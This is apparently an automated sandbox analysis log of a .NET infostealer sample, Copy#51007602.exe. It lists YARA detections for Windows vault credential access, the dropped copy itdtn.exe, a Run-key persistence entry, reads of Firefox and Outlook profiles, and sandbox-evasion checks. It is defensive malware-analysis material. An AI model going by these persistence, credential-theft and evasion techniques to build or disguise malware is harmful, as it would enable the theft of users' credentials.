                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameRamobntk.dll" vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameea41cd90-05ce-41ae-8370-da9b61ece0fb.exe4 vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2126157017.0000000005510000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameea41cd90-05ce-41ae-8370-da9b61ece0fb.exe4 vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000002.00000002.3232483832.0000000001389000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Copy#51007602.exe
                        Source: Copy#51007602.exe, Binary or memory string: OriginalFilenameDoc.exe> vs Copy#51007602.exe
                        Source: Copy#51007602.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: 4.2.itdtn.exe.506b9a8.11.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 4.2.itdtn.exe.506b9a8.11.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Copy#51007602.exe.40111f0.11.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Copy#51007602.exe.3de7dd0.6.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Copy#51007602.exe.3bbe9a0.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@6/3@2/2
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, File created: C:\Users\user\AppData\Roaming\itdtn.exe
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Mutant created: NULL
                        Source: Copy#51007602.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Copy#51007602.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: Copy#51007602.exe, Virustotal: Detection: 28%
                        Source: Copy#51007602.exe, ReversingLabs: Detection: 15%
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, File read: C:\Users\user\Desktop\Copy#51007602.exe
                        Source: unknown, Process created: C:\Users\user\Desktop\Copy#51007602.exe "C:\Users\user\Desktop\Copy#51007602.exe"
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Process created: C:\Users\user\Desktop\Copy#51007602.exe "C:\Users\user\Desktop\Copy#51007602.exe"
                        Source: unknown, Process created: C:\Users\user\AppData\Roaming\itdtn.exe "C:\Users\user\AppData\Roaming\itdtn.exe"
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Process created: C:\Users\user\AppData\Roaming\itdtn.exe "C:\Users\user\AppData\Roaming\itdtn.exe"
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: version.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: version.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: rasapi32.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: rasman.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: rtutils.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: mswsock.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: winhttp.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: iphlpapi.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: dnsapi.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: rasadhlp.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: secur32.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: schannel.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: mskeyprotect.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: ntasn1.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: ncrypt.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: ncryptsslp.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: vaultcli.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: rasman.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: secur32.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: schannel.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: vaultcli.dll
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe, Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                        Source: Copy#51007602.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: Copy#51007602.exe, Static PE information: Virtual size of .text is bigger than: 0x100000
                        Source: Copy#51007602.exe, Static file information: File size 2696656 > 1048576
                        Source: Copy#51007602.exe, Static PE information: Raw size of .text is bigger than: 0x100000 < 0x267400
                        Source: Copy#51007602.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2126157017.0000000005510000.00000004.08000000.00040000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004F89000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.000000000357C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2126157017.0000000005510000.00000004.08000000.00040000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004F89000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.000000000357C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp

                        Data Obfuscation

                        Source: 0.2.Copy#51007602.exe.466e210.5.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                        Source: 0.2.Copy#51007602.exe.466e210.5.raw.unpack, ListDecorator.cs .Net Code: Read
                        Source: 0.2.Copy#51007602.exe.466e210.5.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                        Source: 0.2.Copy#51007602.exe.466e210.5.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                        Source: 0.2.Copy#51007602.exe.466e210.5.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                        Source: Yara match File source: 4.2.itdtn.exe.4cce790.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.itdtn.exe.4ca6770.15.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.45de7d0.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.itdtn.exe.4d1e7b0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.itdtn.exe.4dbe7d0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.453e7b0.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.44ee790.13.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.itdtn.exe.4ca6770.15.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.2c267d0.2.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.itdtn.exe.4cce790.10.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.itdtn.exe.3427aac.2.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 4.2.itdtn.exe.3427aac.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.2c267d0.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.44c6770.7.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.5400000.16.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.44ee790.13.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.Copy#51007602.exe.44c6770.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000004.00000002.2235868873.0000000004CA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000000.00000002.2114770908.00000000045DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000004.00000002.2235868873.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000004.00000002.2235868873.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000000.00000002.2125383195.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000004.00000002.2235868873.0000000004CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000000.00000002.2114770908.0000000004391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: Copy#51007602.exe PID: 6008, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: itdtn.exe PID: 2604, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 0_2_00F13651 push eax; retf 0_2_00F1365D
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 0_2_04EFFAC4 push es; iretd 0_2_04EFFAC7
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 2_2_06FD5150 push es; ret 2_2_06FD5160
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 2_2_06FDFBDD push es; iretd 2_2_06FDFBE0
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 2_2_06FDFBCD push es; iretd 2_2_06FDFBDC
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 2_2_06FDFBC9 push es; iretd 2_2_06FDFBCC
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 2_2_06FDFB99 push es; iretd 2_2_06FDFBC8
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 2_2_06FDFB7D push es; iretd 2_2_06FDFB88
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 2_2_06FDFB71 push es; iretd 2_2_06FDFB7C
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 2_2_06FDFB6D push es; iretd 2_2_06FDFB70
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 2_2_06FDFB55 push es; iretd 2_2_06FDFB5C
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 2_2_06FDFB49 push es; iretd 2_2_06FDFB54
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 2_2_06FDFB44 push es; iretd 2_2_06FDFB48
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 2_2_06FDFB21 push es; iretd 2_2_06FDFB24
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 2_2_06FDFB1D push es; iretd 2_2_06FDFB20
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Code function: 2_2_06FDFB10 push es; iretd 2_2_06FDFB1C
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Code function: 4_2_02F63651 push eax; retf 4_2_02F6365D
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Code function: 4_2_05B0FAC4 push es; iretd 4_2_05B0FAC7
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Code function: 4_2_05B28070 push es; ret 4_2_05B28076
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Code function: 5_2_06FE5150 push es; ret 5_2_06FE5160
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Code function: 5_2_06FEFBCD push es; iretd 5_2_06FEFBDC
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Code function: 5_2_06FEFB44 push es; iretd 5_2_06FEFB48
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Code function: 5_2_06FEFB10 push es; iretd 5_2_06FEFB1C
                        Source: C:\Users\user\Desktop\Copy#51007602.exe File created: C:\Users\user\AppData\Roaming\itdtn.exe
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run itdtn
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara match File source: Process Memory Space: Copy#51007602.exe PID: 6008, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: itdtn.exe PID: 2604, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\Copy#51007602.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Memory allocated: E30000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Memory allocated: 2990000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Memory allocated: 6290000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Memory allocated: 5560000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Memory allocated: 7290000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Memory allocated: 19290000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Memory allocated: 30F0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Memory allocated: 3290000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Memory allocated: 5290000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Memory allocated: 2F60000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Memory allocated: 3170000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Memory allocated: 2F80000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Memory allocated: 1AC0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Memory allocated: 32D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Memory allocated: 52D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Code function: 5_2_06FE7D9B rdtsc 5_2_06FE7D9B
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Window / User API: threadDelayed 1146
                        Source: C:\Users\user\Desktop\Copy#51007602.exe Window / User API: threadDelayed 2238
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Window / User API: threadDelayed 2891
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe Window / User API: threadDelayed 696
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 3144 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -9223372036854770s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200 Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 4836 Thread sleep count: 1146 > 30
